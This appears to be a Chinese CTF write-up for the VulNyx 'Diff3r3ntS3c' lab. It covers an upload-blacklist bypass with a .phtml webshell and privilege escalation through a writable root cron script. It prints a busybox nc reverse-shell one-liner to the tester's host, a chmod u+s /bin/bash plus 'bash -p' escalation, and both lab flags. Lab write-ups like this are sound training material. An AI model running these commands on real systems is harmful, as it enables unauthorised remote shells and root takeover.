当前位置: 首页 > news >正文

vulnyx Diff3r3ntS3c writeup

信息收集

arp-scan

nmap

这里默认的话是只有80端口的,这个22端口是我拿到root后开的

获取userFlag

直接上web看看

扫个目录

把网页拉到最下面可以看到一个文件上传点

我们尝试上传一个php文件

失败了,那xxx呢

上传成功了,看来后端的后缀名校验是基于黑名单了,我们上传phtml试试

成功了,文件应该上传到了uploads目录里,去里面找找

果然能成功解析,看来这里的apache配置文件里是配置了将.phtml后缀的文件当作php文件解析的配置项的(在高版本的apache中默认只会将.php后缀当作php文件进行解析,除此之外需要手动配置)

后面就直接反弹shell了

拿到了candidate用户,这里cd无效的原因是因为没有配置$HOME环境变量。去看一下 /etc/passwd:

通过/etc/passwd发现普通用户确实就只有candiate这个用户,我们去它的家目录下就可以拿到userflag了:

userflag:9b71bc22041491a690f7c7b5fe0f4e8d

获取rootFlag 

在家目录下可以看到一个.script目录,进去可以看到一个makeBackup.sh

这个shell脚本的作用用于备份/var/www/html/uploads目录的,而在家目录里的.backups目录里有一个backup.tar.gz,解包后可以看到如下内容:

这正是我们之前在web上的uploads目录中看到的内容,这说明这个备份脚本已经被触发过了,所以可能存在一个定时任务来定时触发这个备份脚本。把pspy64 pull到靶机上执行

可以看到果然有定时任务触发了makeBackup.sh,而且它的UID是0,这就表示该定时任务是由root触发的,所以就可以利用这个点来提权了,手法有很多,我这里就介绍最容易想到的两个

手法一:利用定时任务反弹shell

在 makeBackup.sh 中写入以下内容:

#!/bin/bash
busybox nc 192.168.43.180 9999 -e /bin/bash

然后kali启动监听,等待定时任务执行,过一会后就可以拿到root shell了

然后去家目录下即可拿到root shell

手法二:利用定时任务给/bin/bash加上suid权限然后提权

makeBackup.sh中写入以下内容:

chmod u+s /bin/bash

等待定时任务执行,然后查看/bin/bash的权限

成功赋予suid权限了,然后通过 bash -p 提权即可 

然后去root家目录下拿到rootflag

rootflag:24886c4b2777d4359cd3dbd118741dda

相关文章:

  • QNAP威联通NAS配置SFTP与内网穿透技术实现远程文件访问
  • 2.6 激光雷达消息格式
  • NAS 资源帖
  • QT打包应用
  • AUTOSAR图解==>AUTOSAR_SRS_OCUDriver
  • 基于可靠消息确保分布式事务的最终一致性:以电商系统中订单服务的新建订单为例
  • springboot音乐网站与分享平台
  • wget批量调用shell脚本
  • Missing Semester计算机教育中缺失的一课:Vim
  • 【力扣 简单 C】141. 环形链表
  • LeetCode 第72题:编辑距离(巧妙的动态规划方法)
  • MCP前后端技术研究和应用实践
  • 中科院医学1区Top:解放军医学院利用多组学+网络药理学+转录组测序联合解析苗药七角生白胶囊抗白细胞减少症的分子机制
  • DataHub 架构设计与核心工作原理
  • Python----OpenCV(图像的绘制——绘制直线,绘制矩形,绘制圆形,绘制多边形)
  • win11修改DNS
  • python基础与数据类型
  • 【和春笋一起学C++】(十九)C++函数新特性——对象的引用作为函数参数
  • springAI 大模型应用开发
  • WooCommerce独立站商城的最大优势
  • 在网站上做外贸/友情链接只有链接
  • 盐城做网站需要多少钱/如何做网站建设
  • 局网站建设工作征求意见/网站流量查询工具
  • 什么网站可以做ppt/营销一体化平台
  • 建站精灵网站模板/优云优客百度推广效果怎么样
  • 阜阳网站建设公司/哪里可以学企业管理培训